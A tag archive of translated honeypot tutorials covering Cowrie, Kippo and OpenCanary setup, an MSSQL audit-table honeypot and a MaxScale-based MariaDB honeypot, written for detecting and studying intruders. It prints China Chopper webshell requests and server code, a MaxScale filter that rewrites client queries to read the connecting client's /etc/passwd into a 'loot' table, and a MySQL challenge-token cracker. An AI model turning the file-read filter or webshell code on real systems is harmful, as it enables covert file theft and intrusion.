Tag archive: honeypot

[Honeypot] Cowrie: an SSH / Telnet honeypot

0x01 Introduction

Cowrie is a medium-interaction SSH honeypot derived from Kippo. Deployed on the public internet it collects attacking IPs, enriches password dictionaries and captures attack samples (the files attackers download); deployed on an internal network it serves as an intrusion sensor and keeps attackers busy on a fake host.


0x02 Installation and deployment

Edit /etc/ssh/sshd_config and change Port 22 to Port 222 so the real sshd moves out of the way, then restart it: systemctl restart sshd

Like Kippo, Cowrie refuses to run as root, and its default listen port is 2222, so port 22 has to be forwarded to 2222 by the firewall (iptables, or on CentOS 7 firewalld as below). Note that the forward-port rule lives in nat PREROUTING, so it only affects connections arriving from other hosts; test from a second machine rather than with ssh localhost.

[root@localhost yum.repos.d]# systemctl start firewalld

[root@localhost yum.repos.d]# firewall-cmd --permanent --add-port=222/tcp

success

[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-masquerade --permanent

success

[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent

success

[root@localhost yum.repos.d]# firewall-cmd --permanent --list-all

public (default)

  interfaces:

  sources:

  services: dhcpv6-client ssh

  ports: 222/tcp

  masquerade: yes

  forward-ports: port=22:proto=tcp:toport=2222:toaddr=

  icmp-blocks:

  rich rules:

      

[root@localhost yum.repos.d]# firewall-cmd --reload

success

Install Cowrie

yum install -y epel-release

yum install -y gcc libffi-devel python-devel openssl-devel git python-pip pycrypto

adduser cowrie -p hehe123   # -p expects an already-hashed password, so as written the account gets an unusable password; that is fine, root switches to it with su cowrie

git clone https://github.com/micheloosterhof/cowrie.git

chown -R cowrie:cowrie cowrie/

cd cowrie

mv cowrie.cfg.dist cowrie.cfg

Edit cowrie.cfg and uncomment listen_port = 2222

pip install -r requirements.txt


0x03 Database setup

[root@localhost data]# pip install mysql-python

[root@localhost data]# yum install mariadb-server mariadb-devel mariadb

[root@localhost data]# systemctl start mariadb

[root@localhost data]# mysqladmin -u root password hehe123


MariaDB [(none)]> CREATE DATABASE cowrie;

Query OK, 1 row affected (0.00 sec)

MariaDB [(none)]> USE cowrie;

MariaDB [cowrie]> source /home/cowrie/cowrie/doc/sql/mysql.sql;

MariaDB [cowrie]> show tables;

+------------------+

| Tables_in_cowrie |

+------------------+

| auth             |

| clients          |

| downloads        |

| input            |

| keyfingerprints  |

| sensors          |

| sessions         |

| ttylog           |

+------------------+

8 rows in set (0.00 sec)

Then fill in the MySQL settings in cowrie.cfg ([output_mysql]: host, database, username, password, port; use a dedicated low-privilege database user for Cowrie rather than root) and start Cowrie as the cowrie user:

[root@localhost cowrie]# su cowrie

[cowrie@localhost cowrie]$ ./bin/cowrie start

Not using Python virtual environment

Starting cowrie: [twistd   --umask 0022 --pidfile var/run/cowrie.pid -l log/cowrie.log cowrie ]...

Login attempts recorded

MariaDB [cowrie]> select * from auth;

+----+--------------+---------+----------+----------+---------------------+

| id | session      | success | username | password | timestamp           |

+----+--------------+---------+----------+----------+---------------------+

|  1 | c66e2505a393 |       1 | root     | hehe123  | 2017-09-13 23:58:48 |

+----+--------------+---------+----------+----------+---------------------+

1 row in set (0.01 sec)

Commands executed

MariaDB [cowrie]> select * from input;

+----+--------------+---------------------+-------+---------+---------+

| id | session      | timestamp           | realm | success | input   |

+----+--------------+---------------------+-------+---------+---------+

|  1 | c66e2505a393 | 2017-09-13 23:58:51 | NULL  |       1 | whoami  |

+----+--------------+---------------------+-------+---------+---------+

1 row in set (0.01 sec)

Files downloaded

MariaDB [cowrie]> select * from downloads\G

*************************** 1. row ***************************

       id: 1

  session: c66e2505a393

timestamp: 2017-09-14 00:01:23

      url: https://www.baidu.com/img/bd_logo1.png

  outfile: dl/264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

   shasum: 264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

1 row in set (0.00 sec)


0x04 Directory layout

data/userdb.txt: the SSH credential file, one rule per line in the form username:uid:password. Rules are evaluated top to bottom and the first line whose username and password both match decides; a password prefixed with ! rejects that password, and * accepts any password. The file below therefore rejects root/root and root/123456 but lets root in with any other password, which keeps the obvious guesses failing while still admitting brute-forcers:

[root@localhost cowrie]# cat data/userdb.txt

root:x:!root

root:x:!123456

root:x:*
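As an added example (not code from Cowrie or from the original post), the following Python reproduces the userdb.txt matching rule described above so a rule file can be checked before it is deployed: rules are evaluated in file order, the first line whose username and password both match decides, a password prefixed with ! denies, and * matches any value. Treating a token written as /regex/ as a regular expression is an assumption about newer Cowrie versions, not something this page shows. The sample rule file is a copy of the three lines above.

```python
import re
from typing import List, Pattern, Tuple, Union

# Constructed copy of the data/userdb.txt listed above (same three rules).
USERDB_TXT = """\
root:x:!root
root:x:!123456
root:x:*
"""

Matcher = Union[str, Pattern[str]]
Rule = Tuple[Matcher, Matcher, bool]  # (login matcher, password matcher, allow?)


def _matcher(token: str) -> Matcher:
    """A token written as /.../ becomes a regex (assumed newer-Cowrie behaviour);
    anything else is a literal. The literal '*' is handled as a wildcard in _match()."""
    if len(token) >= 2 and token.startswith("/") and token.endswith("/"):
        return re.compile(token[1:-1])
    return token


def _match(rule: Matcher, value: str) -> bool:
    if isinstance(rule, str):
        return rule == "*" or rule == value
    return rule.search(value) is not None


def load_userdb(text: str) -> List[Rule]:
    """Parse username:uid:password lines in file order.
    A leading '!' on the password turns the line into a deny rule."""
    rules: List[Rule] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        login, _uid, password = line.split(":", 2)
        allow = True
        if password.startswith("!"):
            allow = False
            password = password[1:]
        rules.append((_matcher(login), _matcher(password), allow))
    return rules


def check_login(rules: List[Rule], username: str, password: str) -> bool:
    """The first rule whose login and password both match decides; no match denies."""
    for login_rule, pw_rule, allow in rules:
        if _match(login_rule, username) and _match(pw_rule, password):
            return allow
    return False


def evaluate(rules: List[Rule], attempts):
    """Decision for each (username, password) attempt, in order."""
    return [(u, p, check_login(rules, u, p)) for u, p in attempts]


if __name__ == "__main__":
    rules = load_userdb(USERDB_TXT)
    attempts = [("root", "root"), ("root", "123456"), ("root", "toor"), ("admin", "admin")]
    for user, pw, ok in evaluate(rules, attempts):
        print(f"{user}/{pw}: {'accept' if ok else 'reject'}")
```

Because the first matching line wins, order matters: putting root:x:* above the two deny lines would accept root/root as well, which is the most common mistake when editing this file.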

txtcmds/*: canned output for emulated commands; the file at the command's path is printed verbatim, e.g. txtcmds/bin/df:

[root@localhost bin]# file df

df: ASCII text

[root@localhost bin]# cat df

Filesystem                                              Size  Used Avail Use% Mounted on

rootfs                                                  4.7G  731M  3.8G  17% /

udev                                                     10M     0   10M   0% /dev

tmpfs                                                    25M  192K   25M   1% /run

/dev/disk/by-uuid/65626fdc-e4c5-4539-8745-edc212b9b0af  4.7G  731M  3.8G  17% /

tmpfs                                                   5.0M     0  5.0M   0% /run/lock

tmpfs                                                   101M     0  101M   0% /run/shm

dl/*: files the attacker fetched with curl/wget, stored under their SHA-256 hash.

[root@localhost dl]# ls

264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

bin/playlog: replays a session's TTY log from log/tty/, showing the attacker's commands as they were typed.

[root@localhost cowrie]# ./bin/playlog  log/tty/20170913-233922-21cf6e129ef5-0i.log

data/fs.pickle: the pickled fake filesystem (directory tree and file metadata)

honeyfs/: the actual contents served for files in the fake filesystem:

[root@localhost cowrie]# cat honeyfs/etc/issue 

Debian GNU/Linux 7 \n \l

log/cowrie.json: JSON event output, one event per line (the same data that goes into the MySQL tables)

log/cowrie.log: log/debug output


MSSQL database honeypot test

Introduction


SQL Server 2008 R2's audit feature can be used as a database honeypot: create a honeypot table in every production database and audit SELECT/INSERT/UPDATE/DELETE on that table; SQL Server writes the audited operations to a file. Since no legitimate application touches the table, any access to it is a strong signal of database reconnaissance (with the false-positive caveat noted at the end).

Test


The test connects to the database through a China Chopper webshell. The request that lists the databases looks like this:

tom=N&z0=GB2312&z1=com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://192.168.***.***:1433;databaseName=***;user=sa;password=***&z2=

The corresponding server-side code:

else if(Z.equals("N")){NN(z1,sb);}

which calls the NN function:

void NN(String s, StringBuffer sb) throws Exception {
    Connection c = GC(s);   // GC(): opens the JDBC connection from the z1 string (helper not shown on the page)
    ResultSet r = c.getMetaData().getCatalogs();   // every database on the server
    while (r.next()) {
        sb.append(r.getString(1) + "\t");
    }
    r.close();
    c.close();
}

getMetaData().getCatalogs() returns the list of all databases.

Double-clicking a database to list its tables sends this request:

tom=O&z0=GB2312&z1=com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://192.168.***.***:1433;databaseName=***;user=sa;password=***
kefu&z2=

which calls OO(z1, sb):

void OO(String s, StringBuffer sb) throws Exception {
    Connection c = GC(s);
    String[] t = {"TABLE"};
    // every user table in the selected database; the driver implements this with a system procedure
    ResultSet r = c.getMetaData().getTables(null, null, "%", t);
    while (r.next()) {
        sb.append(r.getString("TABLE_NAME") + "\t");
    }
    r.close();
    c.close();
}

getTables() ultimately runs the following SQL on the server (the body of the sp_tables system procedure):

select
            TABLE_QUALIFIER = convert(sysname,db_name()),
            TABLE_OWNER     = convert(sysname,schema_name(o.schema_id)),
            TABLE_NAME      = convert(sysname,o.name),
            TABLE_TYPE      = convert(varchar(32),
                                        rtrim(substring('SYSTEM TABLE            TABLE       VIEW       ',
                                              (ascii(o.type)-83)*12+1,
                                              12))  -- 'S'=0,'U'=2,'V'=3
                                     ),
            REMARKS = convert(varchar(254),null)    -- Remarks are NULL.

        from
            sys.all_objects o

        where
            o.type in ('S','U','V') and
            has_perms_by_name(quotename(schema_name(o.schema_id)) + '.' + quotename(o.name),
                              'object',
                              'select') = 1 and
            charindex(substring(o.type,1,1),@type1) <> 0 and -- Only desired types.
            (@table_name  is NULL or o.name like @table_name) and
            (@table_owner is NULL or schema_name(o.schema_id) like @table_owner)
        order by 4, 1, 2, 3

has_perms_by_name(quotename(schema_name(o.schema_id)) + '.' + quotename(o.name), 'object', 'select') = 1

This evaluates SELECT permission on every object in the database, including the honeypot table, and that permission check is what fires the audit. So merely enumerating tables from Chopper, without ever opening the honeypot table, is enough to trigger the honeypot.

PS:
Our DBAs use a tool that exports data from MSSQL to MySQL; clicking Browse in it enumerates tables in the same way and can trigger the same alert, so any client that lists table metadata is a potential false positive.

MariaDB honeypot test

Environment:

First install MariaDB (see the earlier post for the steps), then install MaxScale, a database proxy developed by the MariaDB company.
MaxScale RPM download:
https://downloads.mariadb.com/MaxScale/2.1.0/centos/6Server/x86_64/maxscale-2.1.0-1.centos.6.x86_64.rpm
10.200.1.112 is the server running MariaDB.

[root@kafka112 tmp]# yum install maxscale-2.1.0-1.centos.6.x86_64.rpm

The MaxScale configuration file (/etc/maxscale.cnf):

------------------------------------------------
[maxscale]
threads=1

[server1]
type=server
address=127.0.0.1
port=3306
protocol=MySQLBackend

[EvilFilter]
type=filter
module=regexfilter
options=ignorecase
match=.*server_id.*
replace=LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test.loot

[Read-Connection-Router]
type=service
router=readconnroute
servers=server1
user=root
passwd=Hehe123456
filters=EvilFilter

[Read-Connection-Listener]
type=listener
service=Read-Connection-Router
protocol=MySQLClient
port=4008

[MySQL-Monitor]
type=monitor
module=mysqlmon
servers=server1
user=root
passwd=Hehe123456
monitor_interval=1000
------------------------------------------------

On 10.200.1.111 (the client machine) create a user named mariadb, so that its /etc/passwd contains a line that is easy to recognise later:

[root@kafka111 ~]# useradd mariadb
[root@kafka111 ~]# cat /etc/passwd |grep mariadb
mariadb:x:667:667::/home/mariadb:/bin/bash

From 10.200.1.111, connect to port 4008 on 10.200.1.112 and create the table that will receive the loot:

mysql -h 10.200.1.112 -u root -P 4008 -p
mysql> use test;
Database changed
mysql> create table loot (name varchar(5000));
Query OK, 0 rows affected (0.04 sec)

Any query matching the regex .*server_id.* (case-insensitive, because of options=ignorecase) is rewritten by the filter into LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test.loot, so the innocuous select @@server_id makes the client upload its own /etc/passwd to the server. Two caveats: this only works when the client permits LOAD DATA LOCAL (the mysql client's local-infile setting; newer clients disable it by default), and an attentive client can notice the substitution, since a SELECT comes back as "Query OK, 31 rows affected" instead of a result set:

mysql> select @@server_id;
Query OK, 31 rows affected (0.01 sec)
Records: 31 Deleted: 0 Skipped: 0 Warnings: 0
mysql> select * from loot where name like "%mariadb%";
+--------------------------------------------+
| name |
+--------------------------------------------+
| mariadb:x:667:667::/home/mariadb:/bin/bash |
+--------------------------------------------+
1 row in set (0.00 sec)

The client's /etc/passwd has been written into the loot table.


Reference:

http://www.freebuf.com/sectool/128947.html

[Honeypot] Deploying the low-interaction honeypot OpenCanary

Source:
https://github.com/thinkst/opencanary
https://github.com/thinkst/opencanary-correlator

Documentation:
https://opencanary.readthedocs.io/en/latest/

1) Installation

First move the real SSH service to port 222. Note that SELinux will stop sshd from binding to 222; either allow the port (semanage port -a -t ssh_port_t -p tcp 222) or disable SELinux, otherwise the listener never comes up.
The project requires Python 2.7, while CentOS 6.5 ships 2.6.6, so build 2.7 separately and use it in a virtualenv:

pip install virtualenv
wget https://www.python.org/ftp/python/2.7.8/Python-2.7.8.tgz
tar zxvf Python-2.7.8.tgz
cd Python-2.7.8
./configure --prefix=/usr/local/python/
make && make install
virtualenv venv --python=/usr/local/python/bin/python2.7
. venv/bin/activate
(venv) [root@vincent ~]# python -V
Python 2.7.8
pip install opencanary

OpenCanary ships a default configuration (a JSON file) that we can copy and edit:
opencanaryd --copyconfig
##############################
Error:
cp: cannot stat '/root/venv/bin/../lib/python2.7/site-packages/opencanary/data/settings.json': No such file or directory
Following this commit
https://github.com/thinkst/opencanary/commit/809b1836dee2d6d066ecf66d39f98e2ca3a14eea
remove this line from the opencanaryd script:

cp "${DIR}/../lib/python2.7/site-packages/opencanary/data/settings.json" ~/.opencanary.conf

and add these two lines instead:

defaultconf=$(python -c "from pkg_resources import resource_filename; print resource_filename('opencanary', 'data/settings.json')")
cp "${defaultconf}" ~/.opencanary.conf
##############################

Then:

(venv) [root@vincent ~]# venv/bin/opencanaryd --copyconfig
[*] A sample config file is ready (/root/.opencanary.conf)

[*] Edit your configuration, then launch with "opencanaryd --start"

The configuration file shows which services can be emulated: ftp, http, httpproxy, smb, mysql, mssql, ssh, rdp, telnet and so on.
The log file is /var/tmp/opencanary.log. With the real SSH already moved to port 222, edit the configuration as follows:

{
"device.node_id": "opencanary-1",
"ftp.banner": "FTP server ready",
"ftp.enabled": true,
"ftp.port":21,
"http.banner": "Apache/2.2.22 (Ubuntu)",
"http.enabled": true,
"http.port": 80,
"http.skin": "nasLogin",
"http.skin.list": [
{
"desc": "Plain HTML Login",
"name": "basicLogin"
},
{
"desc": "Synology NAS Login",
"name": "nasLogin"
}
],
"logger": {
"class" : "PyLogger",
"kwargs" : {
"formatters": {
"plain": {
"format": "%(message)s"
}
},
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": "/var/tmp/opencanary.log"
}
}
}
},
"mysql.banner": "5.5.43-0ubuntu0.14.04.1",
"mysql.port": 3306,
"mysql.enabled": true,
"ssh.enabled": true,
"ssh.port": 22,
"ssh.version": "SSH-2.0-OpenSSH_5.1p1 Debian-4",
"portscan.synrate": "5"
}

(venv) [root@vincent ~]# venv/bin/opencanaryd --start
[-] Failed to open opencanary.conf for reading ([Errno 2] No such file or directory: 'opencanary.conf')
[-] Using config file: /root/.opencanary.conf

Check the listening ports:

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN off (0.00/0/0)

2) Testing
Connecting to port 22:

{"dst_host": "172.16.100.167", "dst_port": 22, "local_time": "2016-06-30 10:35:24.064880", "logdata": {"SESSION": "0"}, "logtype": 4000, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 56893}

Port 21:

{"dst_host": "172.16.100.167", "dst_port": 21, "local_time": "2016-06-30 10:38:58.554103", "logdata": {"PASSWORD": "123456", "USERNAME": "root"}, "logtype": 2000, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 35910}

Port 3306 (note that the PASSWORD field here is the hex-encoded 20-byte mysql_native_password challenge response, not the cleartext; testing it against candidate passwords offline also needs the 20-byte salt the honeypot sent in its handshake):

{"dst_host": "172.16.100.167", "dst_port": 3306, "local_time": "2016-06-30 10:39:35.553673", "logdata": {"PASSWORD": "5cc73e54153a4a0322f75d5d2ad4322ab464c1b5", "USERNAME": "root"}, "logtype": 8001, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 35935}

Port 80:

{"dst_host": "172.16.100.167", "dst_port": 80, "local_time": "2016-06-30 10:40:30.727750", "logdata": {"HOSTNAME": "172.16.100.167", "PASSWORD": "123456", "PATH": "/index.html", "SKIN": "nasLogin", "USERAGENT": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "USERNAME": "admin"}, "logtype": 3001, "node_id": "opencanary-1", "src_host": "172.16.100.1", "src_port": 51582}
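The four events above, triaged in Python as an added example (not part of OpenCanary or the original post): the log lines are embedded as sample input, the logtype names are OpenCanary's logger constants for just those four codes (anything else is reported by number), and the MySQL part shows why the 3306 PASSWORD field cannot go straight into a password dictionary: it is the mysql_native_password challenge response, which can only be tested against candidate passwords when the 20-byte salt from the server handshake is known. The salt used in the demonstration is a constructed value; the page's log does not contain the real one.

```python
import hashlib
import json
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

# The four events logged during the tests above, embedded as sample input.
SAMPLE_LOG = """\
{"dst_host": "172.16.100.167", "dst_port": 22, "local_time": "2016-06-30 10:35:24.064880", "logdata": {"SESSION": "0"}, "logtype": 4000, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 56893}
{"dst_host": "172.16.100.167", "dst_port": 21, "local_time": "2016-06-30 10:38:58.554103", "logdata": {"PASSWORD": "123456", "USERNAME": "root"}, "logtype": 2000, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 35910}
{"dst_host": "172.16.100.167", "dst_port": 3306, "local_time": "2016-06-30 10:39:35.553673", "logdata": {"PASSWORD": "5cc73e54153a4a0322f75d5d2ad4322ab464c1b5", "USERNAME": "root"}, "logtype": 8001, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 35935}
{"dst_host": "172.16.100.167", "dst_port": 80, "local_time": "2016-06-30 10:40:30.727750", "logdata": {"HOSTNAME": "172.16.100.167", "PASSWORD": "123456", "PATH": "/index.html", "SKIN": "nasLogin", "USERAGENT": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "USERNAME": "admin"}, "logtype": 3001, "node_id": "opencanary-1", "src_host": "172.16.100.1", "src_port": 51582}
"""

# logtype codes seen in the events above, named after OpenCanary's logger constants.
LOGTYPES = {
    2000: "FTP_LOGIN_ATTEMPT",
    3001: "HTTP_POST_LOGIN_ATTEMPT",
    4000: "SSH_NEW_CONNECTION",
    8001: "MYSQL_LOGIN_ATTEMPT",
}
MYSQL_LOGIN_ATTEMPT = 8001


def parse_events(text: str) -> List[dict]:
    """One JSON object per line; non-JSON lines (startup messages) are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def summarize(events: List[dict]) -> Dict[str, List[str]]:
    """Group events by source address as 'dst_port/EVENT_NAME [user:secret]' strings."""
    by_src: Dict[str, List[str]] = defaultdict(list)
    for ev in events:
        name = LOGTYPES.get(ev.get("logtype"), str(ev.get("logtype")))
        data = ev.get("logdata", {})
        entry = f"{ev.get('dst_port')}/{name}"
        if "USERNAME" in data:
            entry += f" {data['USERNAME']}:{data.get('PASSWORD', '')}"
        by_src[ev["src_host"]].append(entry)
    return dict(by_src)


def cleartext_credentials(events: List[dict]) -> Set[Tuple[str, str]]:
    """Credentials that can go straight into a dictionary. The MySQL event is
    excluded: its PASSWORD is a 40-hex-char challenge response, not a password."""
    creds = set()
    for ev in events:
        data = ev.get("logdata", {})
        if "USERNAME" in data and ev.get("logtype") != MYSQL_LOGIN_ATTEMPT:
            creds.add((data["USERNAME"], data.get("PASSWORD", "")))
    return creds


def mysql_native_scramble(password: bytes, salt: bytes) -> bytes:
    """mysql_native_password client response: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))."""
    stage1 = hashlib.sha1(password).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mask = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mask))


def crack_mysql_token(token_hex: str, salt: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Test candidate passwords against a logged token. Requires the 20-byte
    salt the server sent in its handshake; this log does not record it."""
    token = bytes.fromhex(token_hex)
    for pw in candidates:
        if mysql_native_scramble(pw.encode(), salt) == token:
            return pw
    return None


if __name__ == "__main__":
    events = parse_events(SAMPLE_LOG)
    for src, entries in summarize(events).items():
        print(src, entries)
    print("dictionary material:", sorted(cleartext_credentials(events)))
    # Constructed salt and password, to show the round trip; the page's real salt is unknown.
    demo_salt = b"A" * 20
    demo_token = mysql_native_scramble(b"hehe123", demo_salt).hex()
    print("cracked:", crack_mysql_token(demo_token, demo_salt, ["123456", "root", "hehe123"]))
```

To run it over a live sensor, replace SAMPLE_LOG with the contents of /var/tmp/opencanary.log. If the MySQL tokens matter, the honeypot would also have to record the salt it sent; without it the 8001 events are only useful as source/username indicators.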

[Honeypot] Deploying and using Kippo

1) Environment:

cd /root/
wget https://codeload.github.com/desaster/kippo/zip/master
unzip master
yum install twisted python-zope-interface python-pyasn1
mv kippo-master kippo
useradd kippo
chown -R kippo:kippo kippo/
cd kippo
cp kippo.cfg.dist kippo.cfg

Kippo must be started as an unprivileged user; starting it as root fails with
ERROR: You must not run kippo as root!
An unprivileged user cannot bind ports below 1024, so move the real SSH service to port 222, let Kippo listen on 2222, and add a firewall rule redirecting port 22 to 2222:

iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

Start Kippo

[kippo@vincent tmp]$ ./kippo/start.sh
twistd (the Twisted daemon) 8.2.0
Copyright (c) 2001-2008 Twisted Matrix Laboratories.
See LICENSE for details.
Starting kippo in the background...
/usr/lib64/python2.6/site-packages/twisted/conch/ssh/keys.py:13: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import sha, md5
/usr/lib64/python2.6/site-packages/twisted/conch/ssh/keys.py:13: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import sha, md5
Generating new RSA keypair...
Done.
Generating new DSA keypair...
Done.

Scan port 22 from another machine.

root@kali-vincent:/tmp# nmap -p 22 172.16.100.167

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-29 14:58 CST
Nmap scan report for 172.16.100.167
Host is up (0.00036s latency).
PORT STATE SERVICE
22/tcp open ssh

Port 22 is open.
Log in with the default credentials root/123456:

root@svr03:~# whoami
root
root@svr03:~# pwd
/root

PS: testing shows that far too few commands are emulated, so it is easy to recognise as a honeypot.

2) Storing the logs in a database

yum install mysql mysql-server
/etc/init.d/mysqld start
mysqladmin -uroot password hehe123
CREATE USER 'kippo'@'localhost' IDENTIFIED BY 'kippo';
create database kippo;
GRANT ALL ON kippo.* to 'kippo'@'localhost' identified by 'kippo';
flush privileges;

Edit kippo.cfg:

[database_mysql]
host = localhost
database = kippo
username = kippo
password = kippo
port = 3306

Then import the table schema:

mysql -ukippo -p -Dkippo < /tmp/kippo/doc/sql/mysql.sql

Install MySQL-python:

yum -y install python-devel mysql-devel
wget http://pypi.python.org/packages/source/s/setuptools/setuptools-0.6c11.tar.gz --no-check-certificate
tar -zxvf setuptools-0.6c11.tar.gz
cd setuptools-0.6c11
python setup.py install
wget https://pypi.python.org/packages/source/M/MySQL-python/MySQL-python-1.2.5.zip --no-check-certificate
unzip MySQL-python-1.2.5.zip
cd MySQL-python-1.2.5

Uncomment the mysql_config line in site.cfg:

mysql_config = /usr/lib64/mysql/mysql_config
python setup.py install

The table schema:

mysql> show tables;
+-----------------+
| Tables_in_kippo |
+-----------------+
| auth |
| clients |
| downloads |
| input |
| sensors |
| sessions |
| ttylog |
+-----------------+
7 rows in set (0.01 sec)

Commands executed:

mysql> select * from input;
+----+----------------------------------+---------------------+-------+---------+----------+
| id | session | timestamp | realm | success | input |
+----+----------------------------------+---------------------+-------+---------+----------+
| 1 | 529661ac3e1511e6b417000c292b5908 | 2016-06-29 16:20:15 | NULL | 1 | whoami |
| 2 | 529661ac3e1511e6b417000c292b5908 | 2016-06-29 16:31:10 | NULL | 1 | ifconfig |
+----+----------------------------------+---------------------+-------+---------+----------+
2 rows in set (0.01 sec)

Connecting IPs:

mysql> select * from sessions;
+----------------------------------+---------------------+---------+--------+----------------+----------+--------+
| id | starttime | endtime | sensor | ip | termsize | client |
+----------------------------------+---------------------+---------+--------+----------------+----------+--------+
| 529661ac3e1511e6b417000c292b5908 | 2016-06-29 16:19:58 | NULL | 1 | 172.16.100.128 | 131x25 | 1 |
+----------------------------------+---------------------+---------+--------+----------------+----------+--------+
1 row in set (0.00 sec)

3) Graphs

yum install httpd php php-mysql php-gd php-curl

kippo-graph 1.3 needs a newer PHP than the yum packages provide and would have to be built by hand, so stick with the yum PHP and use the older 1.2:

wget http://bruteforce.gr/wp-content/uploads/kippo-graph-1.2.tar.gz
tar -zxf kippo-graph-1.2.tar.gz
mv kippo-graph-1.2 /var/www/html/kippo
cd /var/www/html/kippo
cp config.php.dist config.php

vim config.php
and set:

define('DIR_ROOT', '/var/www/html/kippo');
define('DB_HOST', 'localhost');
define('DB_USER', 'kippo');
define('DB_PASS', 'kippo');
define('DB_NAME', 'kippo');
define('DB_PORT', '3306');
Then run:
chmod 777 /var/www/html/kippo/generated-graphs/   # wider than needed; chown apache:apache generated-graphs/ is enough for httpd to write there
/etc/init.d/httpd start
su - kippo
./start.sh

The resulting charts (screenshot in the original post, not reproduced here).

4) Directory layout
data: holds the SSH host keys, lastlog.txt and userdb.txt.
  lastlog.txt: the output of the last command, i.e. the record of logins to the honeypot; it can be faked.
  userdb.txt: the accounts that can log in, one per line, format username:uid:password; a user may have several passwords, one line each.

honeyfs: etc/ contains group, hostname, hosts, issue, passwd, resolv.conf and shadow; cat /etc/<file> inside the honeypot prints the corresponding file from this directory. proc/ contains cpuinfo, meminfo and version, served the same way for cat /proc/<file>.

log: the log directory, containing kippo.log and the tty/ directory.
  kippo.log: startup records, connecting IPs and similar.
  tty/: one file per SSH session with everything the attacker typed; strings <file> shows the content directly.
For example, kippo.log after the attacker runs ifconfig:
2016-06-30 00:31:10+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,172.16.100.128] CMD: ifconfig
2016-06-30 00:31:10+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,172.16.100.128] Command found: ifconfig
2016-06-30 00:31:10+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,172.16.100.128] Reading txtcmd from "/tmp/kippo/txtcmds/sbin/ifconfig"

txtcmds: canned command output; each command is a text file whose contents are printed when that command is run.
kippo: the core code, which emulates the interactive commands.
dl: files downloaded with wget and similar.